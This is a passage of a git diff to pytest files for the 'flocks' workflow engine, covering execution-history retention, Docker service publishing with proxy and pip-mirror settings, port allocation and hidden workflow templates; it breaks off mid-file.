@@ -185,6 +223,12 @@ def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int,
     assert recorded_results[0]["status"] == "error"
     assert recorded_results[0]["errorMessage"] == "business rule blocked"
     assert recorded_results[0]["currentPhase"] == "error"
+    assert recorded_results[0]["executionLog"] == []
+    assert recorded_results[0]["stepCount"] == 1
+    assert recorded_results[0]["loopProgress"]["total_iterations"] == 2
+    assert recorded_steps[0][0] == "exec-1"
+    assert recorded_steps[0][1] == 1
+    assert recorded_steps[0][2]["node_id"] == "load"
     assert status["lastStatus"] == "error"
     assert status["lastError"] == "business rule blocked"
     assert status["selectedCount"] == 9
@@ -205,8 +249,17 @@ async def test_no_overlap_skips_when_previous_run_is_still_active(
         "inputs": {},
     }
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         _ = workflow, inputs, timeout_s, trace, cancel
+        _ = on_step_complete
         # Keep the run active until the test releases it so a second tick skips.
         asyncio.run(asyncio.wait_for(threading_event.wait(), timeout=2.0))
         return RunWorkflowResult(status="success", outputs={"load_stats": {"record_count": 1}})
@@ -280,8 +333,17 @@ async def _fake_record_execution_result(
     ) -> None:
         _ = workflow_id, exec_id, exec_data
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         _ = workflow, inputs, timeout_s, trace, cancel
+        _ = on_step_complete
         release_run.wait(timeout=0.2)
         return RunWorkflowResult(status="SUCCEEDED", run_id="run-stop")
 
diff --git a/tests/workflow/test_run_workflow_history.py b/tests/workflow/test_run_workflow_history.py
index 2caa1b25d..9bd6d3f40 100644
--- a/tests/workflow/test_run_workflow_history.py
+++ b/tests/workflow/test_run_workflow_history.py
@@ -1,4 +1,4 @@
-"""Test run_workflow tool keeps execution history in metadata."""
+"""Test run_workflow tool keeps final metadata lightweight."""
 
 import json
 import pytest
@@ -17,7 +17,7 @@ def __init__(self) -> None:
 
 @pytest.mark.asyncio
 async def test_workflow_history_in_output():
-    """History stays in metadata while the default output stays concise."""
+    """Final tool metadata omits retained history while output stays concise."""
     
     # Create a simple test workflow
     workflow = {
@@ -65,35 +65,10 @@ async def test_workflow_history_in_output():
     assert result.success is True
     assert result.output is not None
     
-    # Verify metadata contains history
+    # Final tool metadata should not retain full per-step history in memory.
     assert "history" in result.metadata
     history = result.metadata["history"]
-    
-    # Should have 3 steps
-    assert len(history) == 3
-    
-    # Verify step 1
-    step1 = history[0]
-    assert step1["node_id"] == "step1"
-    assert "inputs" in step1
-    assert step1["inputs"]["x"] == 5
-    assert "outputs" in step1
-    assert step1["outputs"]["result1"] == 15
-    assert step1.get("error") is None
-    
-    # Verify step 2
-    step2 = history[1]
-    assert step2["node_id"] == "step2"
-    assert step2["inputs"]["result1"] == 15
-    assert step2["outputs"]["result2"] == 30
-    assert step2.get("error") is None
-    
-    # Verify step 3
-    step3 = history[2]
-    assert step3["node_id"] == "step3"
-    assert step3["inputs"]["result2"] == 30
-    assert step3["outputs"]["final"] == 35
-    assert step3.get("error") is None
+    assert history == []
     
     # Verify final outputs in metadata
     assert "outputs" in result.metadata
@@ -109,7 +84,7 @@ async def test_workflow_history_in_output():
 
 @pytest.mark.asyncio
 async def test_workflow_history_with_error():
-    """History is preserved in metadata even when execution fails."""
+    """Failure metadata remains lightweight even when execution fails."""
     
     workflow = {
         "name": "test_error_workflow",
@@ -146,25 +121,11 @@ async def test_workflow_history_with_error():
     assert result.success is False
     assert result.error is not None
     
-    # But history should still be available
+    # Per-step details are written through execution step rows, not retained
+    # in the final ToolResult metadata.
     assert "history" in result.metadata
     history = result.metadata["history"]
-    
-    # Should have 2 steps (both executed, second one failed)
-    assert len(history) == 2
-    
-    # First step should succeed
-    step1 = history[0]
-    assert step1["node_id"] == "step1"
-    assert step1["outputs"]["value"] == 100
-    assert step1.get("error") is None
-    
-    # Second step should have error
-    step2 = history[1]
-    assert step2["node_id"] == "step2"
-    assert step2.get("error") is not None
-    assert "Intentional error" in step2["error"]
-    assert "traceback" in step2
+    assert history == []
     
     # Output should contain only the top-level failure summary
     assert "Error:" in result.output
@@ -175,7 +136,7 @@ async def test_workflow_history_with_error():
 
 @pytest.mark.asyncio
 async def test_workflow_history_with_stdout():
-    """Stdout remains in metadata history even if hidden from tool output."""
+    """Stdout is not retained in final metadata history or tool output."""
     
     workflow = {
         "name": "test_stdout_workflow",
@@ -202,13 +163,8 @@ async def test_workflow_history_with_stdout():
     
     assert result.success is True
     
-    # Check history contains stdout
     history = result.metadata["history"]
-    assert len(history) == 1
-    
-    step1 = history[0]
-    assert "stdout" in step1
-    assert "Hello from step1" in step1["stdout"]
+    assert history == []
     
     # Output should stay concise and omit per-step stdout details
     assert "Stdout:" not in result.output
diff --git a/tests/workflow/test_tool_run_workflow.py b/tests/workflow/test_tool_run_workflow.py
index afd0fa491..7edfd9437 100644
--- a/tests/workflow/test_tool_run_workflow.py
+++ b/tests/workflow/test_tool_run_workflow.py
@@ -377,14 +377,7 @@ def run_side_effect(**kwargs):
                 steps=1,
                 last_node_id="node-1",
                 outputs={"enriched_alerts": large_alerts, "message": "done"},
-                history=[
-                    {
-                        "node_id": "node-1",
-                        "node_type": "python",
-                        "inputs": {"raw_alerts": large_alerts, "source": "syslog"},
-                        "outputs": {"raw_alerts": large_alerts, "message": "ok"},
-                    }
-                ],
+                history=[],
                 error=None,
             )
 
@@ -423,12 +416,14 @@ def run_side_effect(**kwargs):
             )
 
         assert result.success is True
-        progress_payload = storage_write.await_args_list[-1].args[1]
-        assert progress_payload["executionLog"][0]["inputs"] == {
+        step_write = storage_write.await_args_list[-1]
+        assert step_write.args[0] == "workflow_execution_step/exec-compacted/00000001"
+        step_payload = step_write.args[1]
+        assert step_payload["inputs"] == {
             "_raw_alerts_count": 150,
             "source": "syslog",
         }
-        assert progress_payload["executionLog"][0]["outputs"] == {
+        assert step_payload["outputs"] == {
             "_raw_alerts_count": 150,
             "message": "ok",
         }
@@ -436,28 +431,16 @@ def run_side_effect(**kwargs):
             "_enriched_alerts_count": 150,
             "message": "done",
         }
-        assert result.metadata["history"][0]["inputs"] == {
-            "_raw_alerts_count": 150,
-            "source": "syslog",
-        }
-        assert result.metadata["history"][0]["outputs"] == {
-            "_raw_alerts_count": 150,
-            "message": "ok",
-        }
+        assert result.metadata["history"] == []
+        assert result.metadata["history_count"] == 0
 
         final_exec_data = record_result.await_args.args[2]
         assert final_exec_data["outputResults"] == {
             "_enriched_alerts_count": 150,
             "message": "done",
         }
-        assert final_exec_data["executionLog"][0]["inputs"] == {
-            "_raw_alerts_count": 150,
-            "source": "syslog",
-        }
-        assert final_exec_data["executionLog"][0]["outputs"] == {
-            "_raw_alerts_count": 150,
-            "message": "ok",
-        }
+        assert final_exec_data["executionLog"] == []
+        assert final_exec_data["stepCount"] == 1
         assert any(update.get("workflow_execution_id") == "exec-compacted" for update in metadata_updates)
 
     @pytest.mark.anyio
@@ -757,7 +740,8 @@ async def test_run_workflow_result_formatting(self, tool_context_with_permission
             assert "Last node: node-3" in output
             assert "Final Outputs:" in output
             assert "Execution History" not in output
-            assert result.metadata["history"] == fake.history
+        assert result.metadata["history"] == []
+        assert result.metadata["history_count"] == len(fake.history)
     
     @pytest.mark.anyio
     async def test_run_workflow_result_with_error(self, tool_context_with_permission, simple_workflow):
diff --git a/tests/workflow/test_workflow_cancellation.py b/tests/workflow/test_workflow_cancellation.py
index a7bfd5621..400ae3bb7 100644
--- a/tests/workflow/test_workflow_cancellation.py
+++ b/tests/workflow/test_workflow_cancellation.py
@@ -117,6 +117,7 @@ def on_step_complete(_step_result) -> None:
         trace=False,
         on_step_complete=on_step_complete,
         cancel=cancel_event.is_set,
+        retain_history=True,
     )
 
     assert result.status == "CANCELLED"
diff --git a/tests/workflow/test_workflow_center.py b/tests/workflow/test_workflow_center.py
index 1675bea7d..7aa12cc8e 100644
--- a/tests/workflow/test_workflow_center.py
+++ b/tests/workflow/test_workflow_center.py
@@ -8,9 +8,55 @@
 import pytest
 
 from flocks.storage.storage import Storage
+from flocks.config.config import Config
 from flocks.workflow import center
 
 
+def test_docker_proxy_env_value_rewrites_loopback_proxy() -> None:
+    """Loopback proxies must point at the host from inside Docker containers."""
+    assert (
+        center._docker_proxy_env_value("http://127.0.0.1:7897")
+        == "http://host.docker.internal:7897"
+    )
+    assert (
+        center._docker_proxy_env_value("https://localhost:7897")
+        == "https://host.docker.internal:7897"
+    )
+    assert center._docker_proxy_env_value("http://proxy.example:8080") == "http://proxy.example:8080"
+
+
+@pytest.mark.asyncio
+async def test_wait_docker_service_healthy_fails_fast_when_container_exits(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """A dead container should surface logs instead of waiting for health retries."""
+
+    def fake_json_get(*_args, **_kwargs):
+        raise OSError("connection refused")
+
+    async def fake_container_state(_container_name: str) -> dict[str, bool]:
+        return {"exists": True, "running": False}
+
+    async def fake_logs_tail(_container_name: str, *, lines: int = 80) -> str:
+        return "pip install failed"
+
+    async def fail_sleep(_interval: float) -> None:
+        raise AssertionError("health check should not sleep after container exit")
+
+    monkeypatch.setattr(center, "_json_get", fake_json_get)
+    monkeypatch.setattr(center, "docker_container_state", fake_container_state)
+    monkeypatch.setattr(center, "_docker_logs_tail", fake_logs_tail)
+    monkeypatch.setattr(center.asyncio, "sleep", fail_sleep)
+
+    with pytest.raises(center.WorkflowCenterError, match="pip install failed"):
+        await center._wait_docker_service_healthy(
+            "http://127.0.0.1:19000",
+            "flocks-wf-dead",
+            retries=10,
+            interval_s=2,
+        )
+
+
 def _workflow_payload(name: str) -> dict:
     return {
         "id": f"{name}-id",
@@ -44,6 +90,7 @@ async def test_scan_skill_workflows_is_idempotent(
     workflow_path = wf_dir / "workflow.json"
     workflow_path.write_text(json.dumps(_workflow_payload("demo")), encoding="utf-8")
     monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
 
     first = await center.scan_skill_workflows()
     assert len(first) == 1
@@ -60,6 +107,37 @@ async def test_scan_skill_workflows_is_idempotent(
     assert third[0]["draftChanged"] is True
 
 
+@pytest.mark.asyncio
+async def test_scan_skill_workflows_skips_hidden_templates(
+    tmp_path: Path,
+    isolated_storage,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """Hidden workflow templates should not enter prompt-visible registry entries."""
+    visible_dir = tmp_path / ".flocks" / "plugins" / "workflows" / "visible"
+    hidden_dir = tmp_path / ".flocks" / "plugins" / "workflows" / "__hidden_template"
+    visible_dir.mkdir(parents=True)
+    hidden_dir.mkdir(parents=True)
+    (visible_dir / "workflow.json").write_text(
+        json.dumps(_workflow_payload("visible")),
+        encoding="utf-8",
+    )
+    (hidden_dir / "workflow.json").write_text(
+        json.dumps(_workflow_payload("hidden-template")),
+        encoding="utf-8",
+    )
+    (hidden_dir / "meta.json").write_text(
+        json.dumps({"hidden": True, "templateOnly": True}),
+        encoding="utf-8",
+    )
+    monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
+
+    scanned = await center.scan_skill_workflows(tmp_path)
+
+    assert [item["name"] for item in scanned] == ["visible"]
+
+
 @pytest.mark.asyncio
 async def test_publish_invoke_stop_workflow_service(
     tmp_path: Path,
@@ -74,33 +152,41 @@ async def test_publish_invoke_stop_workflow_service(
         encoding="utf-8",
     )
     monkeypatch.chdir(tmp_path)
+    monkeypatch.setattr(center, "resolve_global_workflow_roots", lambda: [])
+    monkeypatch.setenv("FLOCKS_DATA_DIR", str(tmp_path / "data"))
+    monkeypatch.setattr(Config, "_global_config", None)
     monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_DRIVER", "docker")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL", "https://mirror.example/simple")
+    monkeypatch.setenv("HTTP_PROXY", "http://127.0.0.1:7897")
     scanned = await center.scan_skill_workflows()
     workflow_id = scanned[0]["workflowId"]
 
     docker_calls = []
+    json_post_calls = []
 
-    async def fake_exec_docker(args, allow_failure=False):
+    async def fake_exec_docker(args, allow_failure=False, **_kwargs):
         docker_calls.append((args, allow_failure))
         return ("container-abc\n", "", 0)
 
     async def fake_allocate_port() -> int:
         return 19123
 
-    async def fake_wait_service_healthy(*_args, **_kwargs) -> bool:
+    async def fake_wait_docker_service_healthy(*_args, **_kwargs) -> bool:
         return True
 
-    def fake_json_post(*_args, **_kwargs):
+    def fake_json_post(*args, **kwargs):
+        json_post_calls.append((args, kwargs))
         return {"status": "SUCCEEDED", "outputs": {"answer": 42}, "run_id": "run-1"}
 
     monkeypatch.setattr(center, "exec_docker", fake_exec_docker)
     monkeypatch.setattr(center, "_allocate_port", fake_allocate_port)
-    monkeypatch.setattr(center, "_wait_service_healthy", fake_wait_service_healthy)
+    monkeypatch.setattr(center, "_wait_docker_service_healthy", fake_wait_docker_service_healthy)
     monkeypatch.setattr(center, "_json_post", fake_json_post)
 
     published = await center.publish_workflow(workflow_id)
     assert published["status"] == "active"
     assert published["hostPort"] == 19123
+    assert len(published["apiKey"]) == 64
 
     invoked = await center.invoke_published_workflow(workflow_id, inputs={"k": "v"})
     assert invoked["status"] == "SUCCEEDED"
@@ -113,8 +199,27 @@ def fake_json_post(*_args, **_kwargs):
 
     assert any(call[0][:3] == ["run", "-d", "--name"] for call in docker_calls)
     run_call = next(call for call in docker_calls if call[0][:3] == ["run", "-d", "--name"])
-    assert "pip install --no-cache-dir /app" in " ".join(run_call[0])
+    run_args = " ".join(run_call[0])
+    assert "python -m pip install uv" in run_args
+    assert (
+        "uv pip install --system -r /runtime/requirements.txt" in run_args
+        or "uv pip install --system /app" in run_args
+    )
     assert "/runtime" in run_call[0]
     assert "-w" in run_call[0]
     assert "/runtime" in run_call[0][run_call[0].index("-w") + 1]
+    assert "-e" in run_call[0]
+    assert any(arg.endswith(":/root/.cache/pip") for arg in run_call[0])
+    assert any(arg.endswith(":/root/.cache/uv") for arg in run_call[0])
+    assert "UV_CACHE_DIR=/root/.cache/uv" in run_call[0]
+    assert f"FLOCKS_WORKFLOW_SERVICE_API_KEY={published['apiKey']}" in run_call[0]
+    assert "PIP_INDEX_URL=https://mirror.example/simple" in run_call[0]
+    assert "UV_DEFAULT_INDEX=https://mirror.example/simple" in run_call[0]
+    assert "HTTP_PROXY=http://host.docker.internal:7897" in run_call[0]
+    assert "HTTP_PROXY=http://127.0.0.1:7897" not in run_call[0]
+    assert "--add-host" in run_call[0]
+    assert "host.docker.internal:host-gateway" in run_call[0]
+    assert json_post_calls
+    assert json_post_calls[0][0][0] == "http://127.0.0.1:19123/invoke"
+    assert json_post_calls[0][0][3] == {"x-api-key": published["apiKey"]}
     assert any(call[0][:2] == ["rm", "-f"] for call in docker_calls)
diff --git a/tests/workflow/test_workflow_center_lifecycle.py b/tests/workflow/test_workflow_center_lifecycle.py
index debedef44..cf1046578 100644
--- a/tests/workflow/test_workflow_center_lifecycle.py
+++ b/tests/workflow/test_workflow_center_lifecycle.py
@@ -2,6 +2,7 @@
 
 from __future__ import annotations
 
+import json
 from typing import Any
 
 import pytest
@@ -118,3 +119,122 @@ async def fake_stop_container(container_name: str) -> bool:
     assert "workflow_runtime/wf-1" not in store
     assert "workflow_release/wf-1/active" not in store
     assert store["workflow_release/wf-1/rel-old"]["status"] == "inactive"
+
+
+@pytest.mark.asyncio
+async def test_allocate_port_skips_reserved_service_records(monkeypatch) -> None:
+    """Port allocation must not reuse API/runtime ports that are only visible in storage."""
+    store: dict[str, Any] = {
+        "workflow_api_service/wf-api": {
+            "workflowId": "wf-api",
+            "serviceUrl": "http://127.0.0.1:19000",
+            "invokeUrl": "http://127.0.0.1:19000/invoke",
+            "status": "running",
+        },
+        "workflow_runtime/wf-runtime": {
+            "workflowId": "wf-runtime",
+            "hostPort": 19001,
+            "serviceUrl": "http://127.0.0.1:19001",
+            "status": "active",
+        },
+        "workflow_registry/wf-registry": {
+            "workflowId": "wf-registry",
+            "serviceUrl": "http://127.0.0.1:19002",
+            "publishStatus": "active",
+        },
+    }
+
+    async def fake_list_keys(prefix):
+        return [key for key in store if key.startswith(str(prefix))]
+
+    async def fake_read(key):
+        return store.get(str(key))
+
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", "19000")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", "19003")
+    monkeypatch.setattr(center.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(center.Storage, "read", fake_read)
+    monkeypatch.setattr(center, "_is_port_available", lambda _port: True)
+
+    assert await center._allocate_port() == 19003
+
+
+@pytest.mark.asyncio
+async def test_allocate_port_reserves_in_flight_allocations(monkeypatch) -> None:
+    """Back-to-back allocations in one server process must not race to the same port."""
+    center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+
+    async def fake_list_keys(_prefix):
+        return []
+
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", "19000")
+    monkeypatch.setenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", "19001")
+    monkeypatch.setattr(center.Storage, "list_keys", fake_list_keys)
+    monkeypatch.setattr(center, "_is_port_available", lambda _port: True)
+
+    try:
+        assert await center._allocate_port() == 19000
+        assert await center._allocate_port() == 19001
+    finally:
+        center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+
+
+@pytest.mark.asyncio
+async def test_publish_workflow_local_releases_reserved_port_on_spawn_failure(
+    monkeypatch,
+    tmp_path,
+) -> None:
+    workflow_id = "wf-local-spawn-fail"
+    workflow_path = tmp_path / "workflow.json"
+    workflow_path.write_text(
+        json.dumps({
+            "id": workflow_id,
+            "start": "n1",
+            "nodes": [{"id": "n1", "type": "python", "code": "outputs['ok'] = True"}],
+            "edges": [],
+        }),
+        encoding="utf-8",
+    )
+    store: dict[str, Any] = {
+        f"workflow_registry/{workflow_id}": {
+            "workflowId": workflow_id,
+            "workflowPath": str(workflow_path),
+            "publishStatus": "unpublished",
+        },
+    }
+
+    async def fake_read(key):
+        return store.get(str(key))
+
+    async def fake_write(key, value):
+        store[str(key)] = value
+
+    async def fake_stop_existing_runtime_for_publish(_workflow_id):
+        return None
+
+    async def fake_write_release_snapshot(_workflow_id, _release_id, _workflow_json):
+        return workflow_path
+
+    async def fake_allocate_port():
+        center._IN_FLIGHT_PORT_RESERVATIONS[19000] = 9999999999.0
+        return 19000
+
+    async def fake_create_subprocess_exec(*_args, **_kwargs):
+        raise OSError("spawn failed")
+
+    center._IN_FLIGHT_PORT_RESERVATIONS.clear()
+    monkeypatch.setattr(center.Storage, "read", fake_read)
+    monkeypatch.setattr(center.Storage, "write", fake_write)
+    monkeypatch.setattr(center, "_stop_existing_runtime_for_publish", fake_stop_existing_runtime_for_publish)
+    monkeypatch.setattr(center, "_write_release_snapshot", fake_write_release_snapshot)
+    monkeypatch.setattr(center, "_allocate_port", fake_allocate_port)
+    monkeypatch.setattr(center.asyncio, "create_subprocess_exec", fake_create_subprocess_exec)
+
+    try:
+        with pytest.raises(center.WorkflowCenterError, match="spawn failed"):
+            await center.publish_workflow_local(workflow_id)
+
+        assert 19000 not in center._IN_FLIGHT_PORT_RESERVATIONS
+        assert store[f"workflow_registry/{workflow_id}"]["publishStatus"] == "failed"
+    finally:
+        center._IN_FLIGHT_PORT_RESERVATIONS.clear()
diff --git a/tests/workflow/test_workflow_fixes.py b/tests/workflow/test_workflow_fixes.py
index 286019116..5b0cddc98 100644
--- a/tests/workflow/test_workflow_fixes.py
+++ b/tests/workflow/test_workflow_fixes.py
@@ -357,8 +357,9 @@ def test_dedup_different_inputs_both_execute(self):
             wf,
             runtime=PythonExecRuntime(),
             stop_on_error=False,
+            history_mode="full",
         )
-        result = engine.run(initial_inputs={})
+        result = engine.run(initial_inputs={}, retain_history=True)
 
         # a -> d (inputs: {x: 1}), b -> d (inputs: {x: 2})
         # Different inputs -> both should execute
@@ -386,8 +387,9 @@ def test_dedup_skips_truly_identical_inputs(self):
             wf,
             runtime=PythonExecRuntime(),
             stop_on_error=False,
+            history_mode="full",
         )
-        result = engine.run(initial_inputs={})
+        result = engine.run(initial_inputs={}, retain_history=True)
 
         # a executes once. b enqueued twice with identical inputs (x=1).
         # Dedup should skip the second execution of b.
diff --git a/tests/workflow/test_workflow_history_mode.py b/tests/workflow/test_workflow_history_mode.py
index 4ebacd36c..87441c5e5 100644
--- a/tests/workflow/test_workflow_history_mode.py
+++ b/tests/workflow/test_workflow_history_mode.py
@@ -34,6 +34,7 @@ def test_run_workflow_summary_history_does_not_retain_large_step_payloads() -> N
         workflow=workflow,
         history_mode="summary",
         ensure_requirements=False,
+        retain_history=True,
     )
 
     assert result.status == "SUCCEEDED"
@@ -50,6 +51,34 @@ def test_run_workflow_summary_history_does_not_retain_large_step_payloads() -> N
     assert result.history[1]["inputs"]["raw_alerts"]["count"] == 200
 
 
+def test_run_workflow_defaults_to_summary_history_mode() -> None:
+    workflow = {
+        "start": "produce",
+        "nodes": [
+            {
+                "id": "produce",
+                "type": "python",
+                "code": "outputs['items'] = [{'body': 'x' * 1000} for _ in range(200)]",
+            },
+        ],
+        "edges": [],
+    }
+
+    result = run_workflow(workflow=workflow, ensure_requirements=False)
+
+    assert result.status == "SUCCEEDED"
+    assert result.history == []
+    assert result.outputs["items"] == {
+        "_type": "list",
+        "count": 200,
+        "preview": [
+            {"_type": "dict", "keys": ["body"]},
+            {"_type": "dict", "keys": ["body"]},
+            {"_type": "dict", "keys": ["body"]},
+        ],
+    }
+
+
 def test_run_workflow_summary_outputs_do_not_retain_large_final_payloads() -> None:
     workflow = {
         "start": "final",
@@ -74,6 +103,30 @@ def test_run_workflow_summary_outputs_do_not_retain_large_final_payloads() -> No
     assert result.outputs["items"]["count"] == 200
 
 
+def test_run_workflow_can_retain_history_when_requested() -> None:
+    workflow = {
+        "start": "produce",
+        "nodes": [
+            {
+                "id": "produce",
+                "type": "python",
+                "code": "outputs['value'] = 1",
+            },
+        ],
+        "edges": [],
+    }
+
+    result = run_workflow(
+        workflow=workflow,
+        ensure_requirements=False,
+        retain_history=True,
+    )
+
+    assert result.status == "SUCCEEDED"
+    assert len(result.history) == 1
+    assert result.history[0]["node_id"] == "produce"
+
+
 def test_python_runtime_can_cleanup_node_globals_after_execute() -> None:
     runtime = PythonExecRuntime(cleanup_globals_after_execute=True)
 
@@ -85,4 +138,3 @@ def test_python_runtime_can_cleanup_node_globals_after_execute() -> None:
     assert outputs == {"ok": True}
     assert "temporary_payload" not in runtime.globals
     assert runtime.globals["outputs"] == {"ok": True}
-
diff --git a/tests/workflow/test_workflow_node_timeout.py b/tests/workflow/test_workflow_node_timeout.py
index 5da9e456c..ffd598a9b 100644
--- a/tests/workflow/test_workflow_node_timeout.py
+++ b/tests/workflow/test_workflow_node_timeout.py
@@ -34,7 +34,7 @@ def test_node_timeout_skips_node_and_records_error():
         node_timeout_s=1.0,
         stop_on_error=False,
     )
-    result = engine.run(initial_inputs={})
+    result = engine.run(initial_inputs={}, retain_history=True)
 
     assert result.steps == 2
     assert len(result.history) == 2
@@ -67,7 +67,7 @@ def test_node_timeout_none_disabled():
         runtime=PythonExecRuntime(),
         node_timeout_s=None,
     )
-    result = engine.run(initial_inputs={})
+    result = engine.run(initial_inputs={}, retain_history=True)
     assert result.steps == 1
     assert result.history[0].outputs["x"] == 1
 
@@ -92,6 +92,7 @@ def test_run_workflow_node_timeout_param():
         inputs={},
         node_timeout_s=0.2,
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
@@ -119,6 +120,7 @@ def test_run_workflow_uses_metadata_node_timeout_default():
         workflow=workflow,
         inputs={},
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
@@ -146,6 +148,7 @@ def test_run_workflow_explicit_node_timeout_overrides_metadata():
         inputs={},
         node_timeout_s=1.0,
         ensure_requirements=False,
+        retain_history=True,
     )
     assert result.status == "SUCCEEDED"
     assert len(result.history) == 1
diff --git a/tests/workflow/test_workflow_parallel.py b/tests/workflow/test_workflow_parallel.py
index fd444ebf4..1207d1a6d 100644
--- a/tests/workflow/test_workflow_parallel.py
+++ b/tests/workflow/test_workflow_parallel.py
@@ -91,7 +91,7 @@ def test_parallel_faster_than_serial(self):
             max_parallel_workers=4,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         assert result.steps >= 5  # start + 3 workers + end
@@ -108,7 +108,7 @@ def test_serial_fallback_when_workers_1(self):
             max_parallel_workers=1,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         assert result.steps >= 5
@@ -123,7 +123,7 @@ def test_parallel_results_correct(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         worker_steps = [s for s in result.history if s.node_id.startswith("worker_")]
         assert len(worker_steps) == 4
@@ -139,7 +139,7 @@ def test_parallel_with_join_node(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         end_steps = [s for s in result.history if s.node_id == "end"]
         assert len(end_steps) == 1
@@ -165,7 +165,7 @@ def test_single_node_no_parallel_overhead(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         assert result.steps == 3
         last = result.history[-1]
@@ -201,7 +201,7 @@ def test_parallel_one_node_fails_stop_on_error(self):
         )
         from flocks.workflow.errors import NodeExecutionError
         with pytest.raises(NodeExecutionError, match="boom"):
-            engine.run()
+            engine.run(retain_history=True)
 
     def test_parallel_one_node_fails_continue(self):
         """When stop_on_error=False, other siblings still complete."""
@@ -226,7 +226,7 @@ def test_parallel_one_node_fails_continue(self):
             max_parallel_workers=4,
             stop_on_error=False,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         ok_steps = [s for s in result.history if s.error is None and s.node_id.startswith("ok_")]
         assert len(ok_steps) == 2
@@ -344,7 +344,7 @@ def _spy_run_sync(coro):
                     wf,
                     runtime=PythonExecRuntime(),
                     max_parallel_workers=4,
-                ).run()
+                ).run(retain_history=True)
 
             worker_steps = [step for step in result.history if step.node_id.startswith("worker_")]
             assert len(worker_steps) == 3
@@ -383,8 +383,9 @@ def test_dedup_with_parallel_batch(self):
             wf,
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
+            history_mode="full",
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
         b_steps = [s for s in result.history if s.node_id == "b"]
         assert len(b_steps) == 1
 
@@ -419,7 +420,7 @@ def test_parallel_timeout_marks_slow_node(self):
             stop_on_error=False,
         )
         t0 = time.perf_counter()
-        result = engine.run()
+        result = engine.run(retain_history=True)
         elapsed = time.perf_counter() - t0
 
         # Should complete near the timeout, not wait for the 5s sleep.
@@ -460,7 +461,7 @@ def test_parallel_timeout_is_non_fatal(self):
             stop_on_error=True,
         )
         # Should NOT raise even though stop_on_error=True, because timeout is non-fatal.
-        result = engine.run()
+        result = engine.run(retain_history=True)
         errors = [s for s in result.history if s.error is not None]
         assert len(errors) == 1
         assert "超时" in errors[0].error
@@ -495,7 +496,7 @@ def test_branch_true_parallel_siblings(self):
             runtime=PythonExecRuntime(),
             max_parallel_workers=4,
         )
-        result = engine.run()
+        result = engine.run(retain_history=True)
 
         executed_ids = [s.node_id for s in result.history]
         assert "a" in executed_ids
diff --git a/tests/workflow/test_workflow_requirements_mirrors.py b/tests/workflow/test_workflow_requirements_mirrors.py
new file mode 100644
index 000000000..0981ba062
--- /dev/null
+++ b/tests/workflow/test_workflow_requirements_mirrors.py
@@ -0,0 +1,87 @@
+from __future__ import annotations
+
+from types import SimpleNamespace
+from typing import Any
+
+from flocks.workflow.requirements import (
+    RequirementsInstaller,
+    SandboxRequirementsInstaller,
+    resolve_python_package_index_url,
+)
+
+
+def test_resolve_python_package_index_uses_chinese_locale(monkeypatch) -> None:
+    monkeypatch.delenv("FLOCKS_WORKFLOW_SERVICE_PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("FLOCKS_WORKFLOW_REQUIREMENTS_PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("PIP_INDEX_URL", raising=False)
+    monkeypatch.delenv("UV_INDEX_URL", raising=False)
+    monkeypatch.delenv("UV_DEFAULT_INDEX", raising=False)
+    monkeypatch.delenv("FLOCKS_UV_DEFAULT_INDEX", raising=False)
+    monkeypatch.delenv("FLOCKS_UPDATE_REGION", raising=False)
+    monkeypatch.setenv("FLOCKS_INSTALL_LANGUAGE", "zh-CN")
+
+    assert resolve_python_package_index_url() == "https://mirrors.aliyun.com/pypi/simple"
+
+
+def test_requirements_installer_passes_index_to_pip(monkeypatch, tmp_path) -> None:
+    calls: list[list[str]] = []
+
+    def fake_run(cmd: list[str], **_kwargs: Any) -> SimpleNamespace:
+        calls.append(cmd)
+        return SimpleNamespace(returncode=0)
+
+    monkeypatch.setattr("flocks.workflow.requirements.subprocess.run", fake_run)
+
+    installed = RequirementsInstaller(
+        installer="pip",
+        cache_dir=tmp_path,
